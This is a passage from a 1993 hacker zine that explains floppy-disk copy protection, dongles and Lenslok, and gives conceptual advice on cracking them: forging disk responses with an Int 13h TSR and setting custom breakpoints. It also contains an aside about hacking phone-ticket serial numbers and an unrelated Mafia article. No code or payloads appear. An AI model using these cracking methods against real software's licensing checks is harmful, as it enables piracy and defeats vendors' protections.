fields, and is compatible with DOS with the help of a TSR program that `fools' DOS in thinking that it was structured correctly. Now, when you `boot' off a diskette, a copy of DOS _MUST_ reside on the outer few tracks of the disk. Another Track is reserved for the file directory. When the computer is turned on, a process occurs, called `booting'. The IBM PC does not contain a built-in DOS. Its ROM contains just enough information to enable to find and read sector 0 of track 0 of the disk, which is the boot sector. That sector contains a program to read a few more sectors, which in turn contains a program to read the entire DOS into memory. % Sector Format % The majority of floppy disks are `soft-sectored', meaning that the software must be able to locate any given track and sector with no help from the hardware. On a `hard-sectored' disks there is a physical marker, such as a small index hole, that tells the hardware precisely where each track and sector is physically located. On the soft-sectored disk the software searches for the desired sector by a trail-and-error process, reading the sector's address field until it finds the sector it wants. This certainly takes a little longer, but allows much more flexibility, since the sectors may be placed anywhere the DOS likes. Anyhow floppies are usually soft-sectored, but IBM 5.25 inch and 3.5 inch diskettes contain physical markers. Hard Disks usually tend to be soft-sectored, but that was only on the MFM, RLL Hard Drives the IDE, and SCSI drives are hard-sectored, that is why we have a _major_ access time. MFM,RLL range at 50-70ms (milliseconds) IDE,SCSI tend to range from 8-15ms. % Copy-protection Method #1 : Disk Appearance % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ % Unformatted Tracks % The simplest protection against disk copier utilities was to include a blank (unformatted) track or sector on the disk. The disk copy utility will fail at that track and copy nothing further. This was probably the first kind of whole- disk copy protection introduced. % Non-standard DOSes % Although the disk cannot be copied, it will still boot and run properly as long as the DOS does not attempt to access the unformatted track. This can be easily be prevented by using a modified version of the normal DOS. When a disk is booted, the DOS on the disk replaces any that may have been in RAM. It can have any modifications the author pleases. The only requirement is that the modifications to the DOS must correlate with the modifications to the disk format. Some of theses methods are listed bellow. a) Altered track/sector count The number of tracks per disk and sectors per track are usually chosen to provide maximum data storage per disk. There is no reason why lesser numbers cannot be used. For example we could create an IBM disk with only 7 sectors per track or 30 tracks per disk. And with a sightly more complex DOS modification the number of sectors could vary from track to track. b) Altered sector size A normal sector on an IBM PC disk always contains 512 bytes of user data as its payload. It is easy to alter the DOS to expect a different number of bytes per sector. In some cases, huge sectors have been used that fill an entire track. c) Altered track/sector numbering Each sector on a disk has an address field containing its track number and sector number. The DOS checks this before reading the track. Instead of numbering the sectors on a track from 0 to 9, one could number them from 70 to 79. The 40 tracks, likewise, could have bizarre numbering, say the first 40 prime numbers. d) Altered checksums Each sector contains a byte which is a checksum of the data contained in that sector. It is calculated by performing an eXclusive-OR (XOR) operation across all the bytes in the sector. The DOS recalculates the checksum each time it reads a sector, and compares its value to the one actually stored in the sector. If they differ, the DOS assumes that it read some byte(s) in the sector incorrectly. One can protect a disk by using a different algorithm for calculating the checksum to be stored in each sector. Of course the disk's own DOS uses the same algorithm, and so agrees with the stored checksums, but standard DOS thinks it has read each sector incorrectly, and will retry up to 5 times, and once all 5 test fail it will report the message "Bad CRC Data...." error message. e) Half-Tracks The newer half-height floppy drive were quite advanced, as a matter of fact they were capable of stepping to positions half-way between the normal track position. These half-track positions are not ordinarily suitable for recording data, because they are so close to the normal track that there would crosstalk. (Meaning signals would spill over from the normal tracks to the half-tracks and vice-versa. On the other hand, the half-tracks can be used it the normal tracks are left unused. For instance a disk could use track 0, 1.5, 2.5, 4, 5, etc. A normal copy program will miss all the half-tracks. % Nibble Copy Programs Fight Back % In response to the above protection techniques, computer hobbyists began to write and circulate special copy programs known as `Nibble Copiers'. These were passed gratis along the grapevine of hobbyists. The first commercially advertised bit copier was `Locksmith' by Omega Microware of Chicago at around 1984. The first version of Locksmith was slow but reliable, and was able to cope quite easily with all the copy-protection methods described above. Within a year other company programs appeared, like Copy-Write, Copy-II-PC and E.D.D., but Locksmith remained the most prominent until Omega Microware collapsed near 1985-86. A bit copier makes as few assumptions as possible about the format of the disk. It does not assume any particular number of sectors pet track or tracks per disk, or any particular number of sectors per tracks per disk, or any other possible sector alteration. This is something DOS was never able to do. Bit copiers read each track, and attempts to reproduce what it finds exactly on the destination disk, bit for bit. Error checking is performed by reading the track several times over and comparing the data. Completely unformatted tracks were identified and ignored. % Spiral Tracking % This is probably the ultimate in format alteration, and the last to be developed. This method was actually very clever. The way the data was structured on the diskette, actually `looked' like a spiralling pattern. The floppy drive heads would travel a small arc starting from the outer track, then jump to the next track (or half-track) and immediately travel another small arc, then jump to the next track, and so on. The resulting series of arcs resemble a broken spiral, hence the name. So instead of track 1 being the outmost ring, it would spiral towards the innermost track. This type of protection is quite difficult for a bit copier to overcome, since it depends on the accurately synchronized copying of partially formatted tracks. Unformatted areas of tracks contain magnetic signals of intermediate values, bits neither 0 nor 1. Therefore it was extremely difficult for the bit copier to identify all those portions of the track that can be copied correctly. One major serious problem with spiral tracking is that it depends on precise timing of events. It the disk drive is rotating a bit too fast or slow, or is slightly misaligned in other ways, the protected disk is likely to fail. % Slow Drives % Another protection technique used in combination with some of the above methods is to record the protected software using a disk drive turning SLOWER than normal. When data is recorded on a track passing slowly under the head, more data per inch than normal is recorded. This makes it possible to record more data on a track than would normally fit. Therefore if the user would try to copy the software with a regular drive, the destination disk will complete a full revolution before all the data is copied, and the tail of the track will overlap and destroy the head of the track on the destination disk. % Copy-protection Method #2 : Signatures % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As we could see the protection wars, escalation proceeded rapidly. The methods described above were all `format alteration methods. They use a non-standard disk format that is not recognized by standard copy programs, but copy-able by the bit copiers. So a new method was introduced, a signature, which was any minor feature of a disk that serves as an identification mark to verify that the disk is an original. To be effective, a signature must be a feature that is not properly duplicated by a copy program, including bit copiers. % Innermost track % Probably the first signature protection method was the use of an extra track. A normal IBM disk uses 0 to 39. The disk drive is in fact capable of stepping the head to an extra innermost track, track 40. (and sometimes to track 41) The innermost track is normally unused because of reliability problems. A protected program may format this track and use the fact that it is formatted as a signature to verify that the disk is an original. It may even keep some portion of itself (eg the disk directory) on the innermost track. An ordinary copy program will overlook this track, and a bit copier will only copy it if specifically instructed to. % Check for write-protection % An ancient and crude signature method is to issue original disks with the write-protect notch covered. The program would try to write to the disk, if the write operation succeeds, the program can assume that the user made a duplicate disk and refuse to execute. % Bit Counting % It is _very_ difficult to get two disk drives to turn at precisely the same speed. Any characteristic of a disk that depends critically on the speed of the drive on which is was recorded will make a good signature. For example, when a disk is formatted, there is always some empty spaces remaining on each track between the end of the last sector and the beginning of the first sector. The formatting program fills this space with meaningless bits. The size of the space, and therefore the number of bits, and therefore the total number of bits on the track, depends on the rotational speed of the disk drive. If the bits are counted, and the count is recorded somewhere else in the disk, the software can compare the number of bits to the count every time the disk is booted. If a duplicate is made on a different drive, the duplicate disk will have a different number of bits on that track, and the count will fail. Even small variations in the speed of a single drive will cause different disks made on that drive to have different numbers of bits per track, so that each disk has a different signature. This is an _extremely_ difficult protection method for bit copiers to overcome. Some version of Locksmith included a utility to prompt the user to adjust the speed of the drive (by turning a vernier with a screwdriver) until it matched the apparent speed of the drive on which the original disk was recorded. However, E.D.D. (Essential Data Duplicator) used a variable timing loop to vary the rate at which the bits are recorded on the destination disk, to compensate for the speed of the destination disk drive. These methods required a great deal of trial-and-error to make satisfactory duplicate disks. % Deliberately Damaged Media % This method consisted of deliberately damaged media; a disk which is damaged in a predictable way that can be detected by the software. The damage serves as a signature. An example is the `Prolok' systems by Vault Corporation. Prolok is a special disk sold to software companies, to publish their programs on. The disk included software that may be adapted to work with any application program the software publisher records on the disk. The signature is a small hole, cut by laser, in the recording surface of the disk. The Prolok software can detect this hole because it is an area on which no data can be recorded, bad sector. Prolok is actually quick easy to defeat for a programmer. The technique was to insert a small TSR program hooked to int 13h, and it would review all requests by programs to the DOS. If Prolok asks the DOS to read the area of the disk where the hole is, the TSR captures the request and forges a reassuring response. There was also a pubic domain program specifically designed to defeat Prolok, called FUProlok. In general ALL these disk-based copy-protection had one major flaw, they all had some easy pattern that would enable us to defeat them easily. The pattern was the usage of Int 13h, the knowledgable `cracker' would construct a simple generic TSR that would hook Int 13h, that would create a break-point (Int 3h) whenever the interrupt was called. From there the knowledgable cracker could trace through the code, and see if the information obtained by the Int 13h was used in a peculiar method. Most programs are written in a high level language so the use of Int 13h is not common therefore get to the bottom of the Int 13h % Difficulties of Disk-based Copy-protection % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The major obstacle of disk-based copy-protection was a hard disk. Hard disk users were not content to run programs from the floppy disks, they almost insisted on transferring the software to the hard disk. One solution that was adopted was for the program to execute itself from the hard disk, but to also require the floppy to be left in its drive. The floppy was usually referred to as a `key disk', which was periodically checked to validate the signature. The major problem was that it didn't allow the user to have access to his floppy drive while using the hard disk. Another bad side effect was that it prevented users connected to a network, in executing more than one copy at the same time, as you only had one copy of the `key disk' to go around. And all of the `format' methods examples cannot be used on a hard disk. In general you cannot tamper with the structure of the hard disk, because it may contain several hundreds different applications. Also the interface system does not give the host computer direct control of details like the number and arrangement of sectors per track or count of bits on a track. ================================================================================ ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "The `Arms Race' on Physical Protection -N E- Devices : Round Two" Nu -N uK Nu By KE uK Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % Physical Copy-protection Devices % A physical protection device is usually a piece of equipment to a computer or used in conjunction with a computer to protect software or data. The majority of such devices are commonly referred to as `dongles', which are electronic devices attached to the computer. When a dongle protection is used, no attempt is made to prevent the user or owner of the package from creating additional copies of the software. The device is designed to prevent unauthorised use and not unauthorised copying. The origins of the word `dongles' is obscure, but it originated about 1978-79 and is believed to have been first used to protect the `Wordcraft' package on the Commodore Pet. % Dongles - A Simple Dongle Design % The first problem in designing a dongle is finding some method of attaching the device to the hardware. It must be a method which is available on the standard minimum configuration machine for which the software is intended to run. The _most_ obvious choice is the serial interface port of which nearly every machine has at least one, especially with the increase use of mice and modems which require serial connections. Assuming further that we do not wish to use this port during the running of the program, then a very simple dongle could be constructed using the standard cabling and reverse channel so that communications are usually made in both directions simultaneously. The wires would have the following functions: Sending Channel ~~~~~~~~~~~~~~~ Request to send (Output when the computer is ready to go) Clear to send (Received when the terminal is ready) Transmit data (Line for the computer to transmit the data) Receiving Channel ~~~~~~~~~~~~~~~~~ Data Terminal Ready (Output when the computer is ready to receive data) Data Set Ready (Received when the terminal is ready to transmit) Receive Data (Line for Computer to receive the data) Carrier Detect (Line for modem to signal the computer that (another modem signal has been found via telephone) Ring Detect (Line for modem to signal the computer that a) (ringing tone has been received) Assume that wires are used to connect the signals as shown below: Standard output Standard inputs ~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~ Transmit data..........Data Set Ready Request to send........Receive Data Data terminal ready....Ring Detect This is a bizarre combination, which is extremely unlikely to be used by design with any sort of equipment. To protect our dongle we further seal the plug casing with pitch or epoxy resin so that the details of the wiring cannot be seen without melting out or drilling away the resin. The representation of a `U' character in the standard ASCII code will appear as a square wave. This is because the character itself has the binary value 0101 0101, and, taken with the character beginning pulse (start bit) and the character ending (stop bit), this makes up a square wave signal 1 0101 0101 0 +6v-+ +-+ +-+ +-+ +-+ +-+ Now, Transmit a stream of `U's, since Transmit is | | | | | | | | | | | connected to Data Set Ready, this will go up and 0 | | | | | | | | | | | down, at intervals of one bit. By Sampling this | | | | | | | | | | | line the program can test that the correct pattern -6v +-+ +-+ +-+ +-+ +-+ +- is being transmitted and received. This means the dongle is in place. This is a perhaps a dongle suitable for the computer hobbyist, it rather is quite a poor attempt as a dongle. This is because of several reasons; it does not allow the use of the serial port because it is needed for the dongle, therefore a mouse or modem or printer connection via the serial port can not be done if you only have one serial port. % Advanced Pseudo Random bit Generator Dongles % Two new devices being marketed to software homes are Datakey (DES, 1988) and Software Key (Bristol, 1988). The overall concepts of both are similar, and they were in fact developed by the same inventor, although the two structures are quite separate and the details of the devices differ alot. The devices are `active' dongles. Meaning one end of the dongle plugs into the computer, and whatever is normally connected to the RS232 port is connected to the other end, and should be unaffected by this device. In the Datakey, which is a bit oriented device, toggling the Data Terminal Ready line causes a single bit of data to be presented at Data Set Ready or the Data Carrier Detect Line. By this means, a string of pseudo random binary data of any length can be read out of the device. Assembly language routines are included with the device for linking into the software to be protected. In the Software Key, special command codes are used to trigger the device, which responds with a byte of pseudo random data. Such sequences only repeat after an extremely large number of operation. % Software Sentinel % The Software Sentinel (Sentinel, 1988) plugs into the parallel printer port of an 80x86. The parallel channel was preferred to the serial channel since the parallel channel is always present on many systems, even with minimum configuration. However Sentinel also have a serial port version of this device called the Sentinel S. % Dongle Cracking % ~~~~~~~~~~~~~~~~~~~ Some exports are scornful of the protection afforded by dongles. Some even boast that 30 minutes would usually be sufficient to bypass any dongle protection in any program. As a matter of fact dongle cracking is actually straight forward, simply find the routine that accesses the dongle test. The difficulty of this job is really based on the software used to access the dongle. If the software accesses the parallel/serial port via interrupt functions, a simple TSR program can be stated to `fool' the program that a dongle is present, or simply trace through the code from that point on to see what actually happens, and what the program expects to get back. However I do not expect a program to use interrupts to access an I/O port for the sole reason of easily breaking in via the vector table. Chances are the software is accessing the I/O port directly with the built in processor instructions (OUT/IN). So it will be up to the user to disassemble the program to search for IN/OUT or INS/OUTS or INSB/OUTSB or INSW/INTSW instructions that will access the parallel/serial ports. Once you locate the routine that accesses the port, you may either reverse engineer or set a break-point and attempt your journey of debugging. Nevertheless, this does not nullify the credablity of dongle protection. As a matter of fact several new software are using dongles to protect their software. But the fact remains, no software is 100% secure. Dongles, require software to `test' that the dongle is attached, therefore the possibility of finding the `test' routine exists, and therefore modification is possible. % Lenslok % The Latest Physical Protection Device % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Lenslok device was also designed for the low cost software end of the market. The device consists of a plastic lens device rather like a pocket magnifying glass. It contains a series of prisms which cause anything viewed through it to be seen as a confused jumble of different dots. (pixels) Figure #1 Figure #2 1 2 3 4 5 A B C D E ÚÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿ ÚÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿ The letter `A' normally looks ³ ³ ³ X ³ ³ ³ ³ X ³ ³ ³ ³ ³ like the pattern in figure #1. ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ Scrambled, it could look like ³ ³ X ³ ³ X ³ ³ ³ ³ X ³ ³ X ³ ³ the pattern shown in #2. All ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ that was done was that column ³ X ³ ³ ³ ³ X ³ ³ ³ ³ X ³ ³ X ³ 1 & 3 were interchanged. So if ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ we took column A & C and swapped ³ X ³ ³ ³ ³ X ³ ³ ³ ³ X ³ ³ X ³ them, we would get the ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ charactor `A' once again. ³ X ³ X ³ X ³ X ³ X ³ ³ X ³ X ³ X ³ X ³ X ³ Then the Lenslok would consist ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ of a simple optical system, ³ X ³ ³ ³ ³ X ³ ³ ³ ³ X ³ ³ X ³ which consists of two shallow ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´ angled grooves cut into the ³ X ³ ³ ³ ³ X ³ ³ ³ ³ X ³ ³ X ³ plastic which change over the ÀÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ ÀÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ columns. So, the user would apply the `lens' to the screen, over the jumbled pattern of dots and presses a key until the pattern appears through the prism. Therefore, in a Lenslok protected system, you may have a word, scrambled, which the system may ask you to respond to, whereby you would take the lens, and pass it ontop of the charactor and voila. % Cracking all together now... % ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Lenslok, is a great physical copy-protection, it is low-costing, it can be used inconjuction with the current `Document Protection' currently widely used in several low-cost software, expecially in home entertainment computer games. Document protection, is whereby the program, mainly in the beginning, will stop for a moment and ask you a question, whereby the answer is only to be found in the documents supplied with the original package. Nevertheless, document protection, is fairly weak, as documents can be easily photocopied. It can also be scanned as a computer image, and can be easily distributed, through computer modems, into the computer BBS scene. So to an extent Lenslok can help document protection, as a lens is not easily copied by your average computer hobbyist. So even though a copy of the documention is made, how are we to know what exactly it (the software), is asking us for? All together now, _ALL_ protection schemes developed now, can be broken, may it be, Lenslok, dongles, disk-based protection schemes. This is due to the reason that all protection schemes have to use some sort of software that will `test', and decide if this is an authorised copy or not. The fact of the matter is, that their is a terrible weak spot. Software protectors have developed _amazing_ protection schemes, the `front' of the protection is almost unbreakable. Emagine a castle in medival times, with a moat around the castle, the moat contains deadly man-eating animals, the front of the castle also have men waiting with boiling oil to throw over you, there is also several men with bows and arrows awaiting to kill you. Now, how effective is this, if somebody leaves the back gate unlocked? Sure, it may be nearly impossible to get through by the front, but the back gate is unguarded. The same applies for copy- protection, whereby the fact of the matter is, that nobody has done anything about low-level entry! Anyone capable of 80x86 structure assemble language, can by-pass a copy-protection. The only problem is finding the routine, this is a challenge within itself, it is rarely a just a CMP command. For some reason NPC members think that CMP is all there is to look for! Aren't they acomplished crackers? Cracking involves alot of time, extreme knowledge on the 80x86, and a few tricks of the trade. If a document check awaits you to type an answer, you will need to set a break-point at that exact location. Ctrl-Break, will _rarely_ work, so you will have to make tools of your own, that will allow you to exit at the desired location. Protected software usually overwrite the Int 3h, and Int 1h, to avoid break-points, you will have to devise your own Break-point type program, perhaps one hooked to Int 9h, and at ALT-A it will execute a Int 3h, and at the same time you will enter your debugger entry point back to Int 3h. I would hook my TSR to Int 5h and on Print-Scrn it would load the debugger. Many times, you would have to put a special routine on Int 8h or 1Ch to make sure that your entry point is not erased at the vector table, there's an unlimited number of possible combinations, I certainly cannot name you them all. But what I can do, is give you the theory concept of the protection scheme, and you can devise your own pleasable method. Many, people enjoy reverse engneering jobs, some (like myself) take note of all systems I/Os and Interrupts being called, and work my break-point from there. But this two-part article was to give you an understanding on how some copy- protection schemes work. The _only_ way one can attempt to defeat the protection is to understand how the protection works. Then your attempts to bypass it will be much more effective, rather than taking a non-effective guess. Be direct, go directly to the source of the conflict, don't waste your time on anything else. So I do hope this has been a learning experience for at least some. If demand is there, in the following news journal we may focus on effective cracking techniques, and some tricks and tips to avoid falling into a ditch. Rock Steady/NuKE ============================================================================================================================================================== Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "AT&T Talk Tickets" -N E- Nu -N uK Nu By KE uK Nowhere Man E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu Introduction ~~~~~~~~~~~~ As many people know, many countries throughout the world have begun installing a new pay phone system which takes "phone cards" in addition to or instead of coins. These phone cards are unlike U.S. calling cards, rather they are more like credit cards: they have a magnetic strip which holds the value of the card. You buy a card in a certain denomination (say $10) and then you can place that amount of calls with the card. The U.S., however, is unwilling and unable to impliment such a program. (Remember, this is the country which brings you the English System of measurement!) Not only would it cost too much, so they say, but there is also a problem not found in most other countries -- competiton. Pay phones may be owned by anyone, from the local phone company to the foreigner who owns the local Duncan Doughnuts; to get everyone to agree to a standard and to replace existing phones with card-ready phones would be unfeasable. So now AT&T and U.S. Fibercom are introducing an alternative: "Talk Tickets." What are Talk Tickets? ~~~~~~~~~~~~~~~~~~~~~~ Talk Tickets are not magnetic-striped cards or calling cards, they're a strange cross between both. You'll be able to purchace a Talk Ticket in certain demomination, each carrying a certain number of $0.60 "units." Cards will be available in 5, 10, and 50 unit ($3, $6, and $30) denominations. The card itself is a small cardboard ticket bearing a unique eleven-digit serial number (and some rate/call information). You call an 800 number and a voice prompts you for your ticket number. Once you've entered a valid number, the voice will tell you how much money is left on the ticket (you don't have to use the full value of the ticket on one call, leftover time is kept track of). Then you place your call, just as if you were dialing from a normal line, with a few exceptions: there are special "star" services you can dial, recordings costing one unit each (like 976 numbers), and international calls do not require the usual "011" prefix. The call is then handled normally, however if your ticket runs out of credit during the call you are abruptly disconnected. Costs ~~~~~ As mentioned before, calls are billed in $0.60 units. The chart below gives the cost, in units per minute, for calling various locations. Area Units/Minute ~~~~ ~~~~~~~~~~~~ *1 (Sports News) 1 *2 (World News) 1 *3 (U.S. Weather) 1 Asia (incl. Australia and NZ) 5 Africa 5 Canada 3 Europe (except former U.S.S.R.) 4 Russia/Former U.S.S.R. 5 South America 4 United States (incl. AK and HI) 1 These rates are much higher than standard calling card or direct-dial rates -- a call to Europe is $2.40/minute, Canada is $1.80/minute, and Asia is a whopping $3.00/minute. This is cheaper than a coin call from a pay phone, but other than that it's extremely expensive. Where do I get Talk Tickets? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Right now Talk Tickets are available on a limited trial basis via McDonald's. That's right, McDonald's. Three-unit Talk Tickets will be given away free in Super-Value Meals until June; the catch is that it's a limited trial offer, avaliable only in the following areas: New York City, Buffalo/Syracuse, Baltimore, Pennsylvania, and Wisconsin. You can also get them via Patrick Townson, moderator of the Telecom Digest on Internet (ptownson@eecs.nwu.edu), for $2 per four units (or $1.50/card in groups of ten or more). In addition, Talk Tickets should soon be on sale at AT&T phone centers near you... Important Numbers ~~~~~~~~~~~~~~~~~ The 800 Talk Ticket access number is 800-331-0888. For more information about the Talk Ticket program, call 800-462-1818 (outside the U.S. call 408-428-2734 collect). The operator will be happy to answer your questions about the Talk Ticket program. Hacking Talk Tickets ~~~~~~~~~~~~~~~~~~~~ I'm sure the first thing you though of when you read about Talk Tickets is "how can I abuse them." Well, there's really no reason to. First off, the serial number is eleven digits -- however it's created algorythmically, meaning it *can* be hacked. However, even if you do manage to generate your own Talk Ticket numbers, its not of much value if you're calling outside the U.S. You can get almost an hour within the country on a 50 unit ticket, but that same ticket would only get you about 12 minutes to Europe or 10 minutes to Asia. You're better off not wasting your time, calling cards are much better. Conclusion ~~~~~~~~~~ SAVE YOUR MONEY. There is little reason to use the Talk Ticket program. Calling card calls are much cheaper -- heck, even hotel surcharges are usually less costly! In addition the potential for abuse is limited; the most you can fraud would be 10 minutes to Australia, big deal. The one key advantage, though, that the tickets offer is anonymity. You are just a number, and unlike with a calling cards, you pay cash up front, and are not billed directly, so your privacy is mantained. So, unless you need the protection (and are willing to pay through the nose for it!) AT&T Talk Tickets are a waste of time and money. Nowhere Man/NuKE =============================================================================== ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Mafia, Incorporated." -N E- Italy's underworld extends its reach Nu -N uK Nu By KE uK The Godfather E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu Like any business bursting at the seams of its own success, the Mafia and its allies know no borders. Born of a transatlantic axis, the Mafia has forged alliances wherever it has needed to, sponsoring indigenous crime syndicates or helping rivals to wipe each other out. The manipulation of the Turkish heroin "Babas" or the drug barons of Colombia has become a model of how to operate an empire to the conquering power's advantage. Internationally, the Mafia is stronger than ever before, recent attempts of the crackdown show it to be expanding with speed, in Russia and other post-communist countries, buying up chunks of the economy, laundering money, dealing with local gangsters, and preparing to create and cultivate an eager market for hard drugs. The Mafia runs the world's drug-dealing business, and its wealth is inestimable. The giddy profits from South America, the US, and the Far East are laundered, recycled, and hidden by the best wizards in the money business across an impenetrable labyrinth of `legal' commercial activities. "They would do well to go to Havard Business School." says Leoluca Orlando, the ousted anti-Mafia mayor of Palermo, Sicily. This statement is probably true, however it may be hard to put to the test! Because to `protect' the empire, the Mafia must kill. And however wide its intercontinental span, it kills mainly on its own ground and at its nerve centre, where it has, until now, enjoyed relative impunity: in Italy. A bombing last year this time (May 1992) killed Judge Giovanni Falcone, one of the few men _ever_ to momentarily check the squalid advance of the Mafia. Mr. Falcone, was quoted as "The worlds _most_ wanted man!", wanted that is by the Mafia. Mr. Falcone did contain assortments of documentation and knowledge, on the Mafia structures, therefore possing a great threat to the Mafia, and killed by the Mafia. After the killing of Mr. Falcone, who was one of the world's _most_ protect man. Who, was to challenge the Mafia and continue Mr. Falcone's work? Two months later, a `fake' construction crew pretending to repair a segment, of the highway, placed a bomb under that segment of the `repaired' road. The bomb was set off just as Paolo Borsellino, passed underneath it in his limo. Paolo Borsellino had _secretly_ taken over from Falcone as head of the Anti-Mafia group in Palermo. How did the Mafia find out so quickly? The Mafia contains extremely loyal men, in almost all levels of the government, and someone tipped the Mafia that Mr. Borsellino was heading a new Anti-Mafia government agency in Rome. With this simple message of triumphant monkery, the Mafia confirmed that it will wage its latest, and potentially its bloodiest, battle against Italian society with a sick blend of fury and cool, diabolical arrogance. This time the Mafia's violence is not between clans, nor is it the _usual_ picking off of inconvenient politicians and judges at intervals of years. This time the offensive opposition and terrorizing a rebelling populace back into submission. Following Borsellino's assassination, the Italian authorities sent in troops for the first time against the Cosa Nostra. Nobody _ever_ dared to go against the Cosa Nostra! The Cosa Nostra has grown from what was believed to be a band of gangster operating out of the chaos of postwar Sicily, to become, in 47 years, an unchallenged and unchallengeable global crime syndicate. The officials and troops are shadowboxing, and judges have resigned, saying that their work is pointless, their lives are undefended, and their investigations are blocked from on high. The killers of Falcone and Borsellino want to show that they can kill with impunity and that they are protected from within the system. Almost _every_ time the judiciary peels away the covers of Italian high finance, construction, tourist development, local politics, or public-sector spending excesses, it finds the Mafia. Every illegal arms deal and, of course, every drug haul leads directly to the Mafia. There seems to be no obvious explanation for its success other than ruthless cruelty, unfettered greed, friends in high places, and the perpetuation of the picturesque and bogus mythology in which the Mafia's squalid operation is gift-wrapped for hollywood and young inmates alike. The `super-boss' of this awesome empire, on the run since 1969 and the world's most wanted man is Salvatore `Don Toto' Riina, head of the clan from Corleone, the town that gave its name to Francis Ford Coppola's glitzy `Godfather' clan. Riina was the right-hand man to Luciano Liggio, who was arrested on a night in 1973 while reading Kant's `Critique of Pure Reason' and has been imprisoned ever since. Liggio had built up the Corleone clan, the main victors of the Mafia was of 1981-83 that left defeated clans obliged to work as clients, subject to Corleone approval. Riina and his partner, Bernardo Provezano, known as `The Beasts' carried out Liggio's orders. Riina is wanted for ordering some 150 murders and is said to have committed 40 himself. They were the founders of the empire. Perhaps most extraordinary, Riina is the man whom authorities believe finally subjugated the New York wing of the Mafia not only to Sicily but to his clan. Authorities also confirm that the Corleone clan manages the affairs of the Sicilian's long-standing colony in South America, notably in Venezuela. The Cuntrera and Caruana families from Agrigento, are now prime managers of South America's current cocaine surplus. The most resent meet ever to be recorded by the authorities took place on Valentine's Day 1989, there was a meeting at the Elysee hotel in Nice of members of a consortium comprising the Sicilian Mafia, the giant Mafia, the octopus, along with two divans of the Italian crime empire: the Calabrian and the Camorra of Naples. Representatives of the Colombian and Venezuelan cartels were also present. The outcome of this meeting was an alliance and a carving up of the trade bringing heroin from East and cocaine from the South America. By and large, the Sicilians kept the heroin routes and a footheld in the white-power trade, the Calabrians won a lucrative client role in heroin, and the Camorra emerged as the specialists in cocaine. The Camorra's international interests span South America and Spanish and French Rivieras. It has drug peddling bases in Holland and Germany. For the first time, the Mafia faces a new enemy: its own subjects. The rebellion appeared in the last few years, when Leoluca Orlando, mayor of Palermo, promised to confront the Cosa Nostra. He _did_ expelled the Mafia from city hall. The revolt went on, Libero Grassi, a businessman in Capo D' Orlando, refused to pay his small protection fee; he was shot as a lesson to others. The two judges killed (Falcone & Borsellino) provoked a street rebellion(s), general strikes, and the biggest demonstration in Italy's history. The fear of violence has lead to the European Community (EC) to find back! Europol, the European Police, until recently had been nothing more than a harmless paper thing. But this was to change starting January 1st, 1993. Today, Riina is located at Rebibbia prison in Rome, where interrogation has already begun. So far, Riina has refused to cooperate with his captors, who nevertheless say that he is behaving `with the politeness of a Sicilian that does not exit any more. Riina was arrested in Palermo, Sicily in February, 1993. During the period of surveillance, Riina met with politicians of the highest level, which began soon after the assassination of judge Giovanni Falcone. Organized crime has long operated internationally, with no boundaries, perhaps Europol was exactly what is needed, a police force with no boundaries? And was Europol the result of Riina being captured. Many would disagree. Nevertheless the Mafia continues, with or without Riina. 1993 will be a dreadful year for the Mafia, it is yet to end. One of the `Big' players is gone, Riina, what happens now? "L'appetito viene mangiando" Translation: Eating makes you hungry. The Mafia, already fed to bursting, remains very hungry indeed. ================================================================================ ================================================================================ Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "Rivest, Shamir, Adleman, (RSA) Encryption" -N E- Nu -N uK Nu By KE uK Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu Ahh, the last NuKE Informational Journal #5, concerning DES Encryption brought about a fair amount of generous reviews. It has even inspired me to continue this topic of 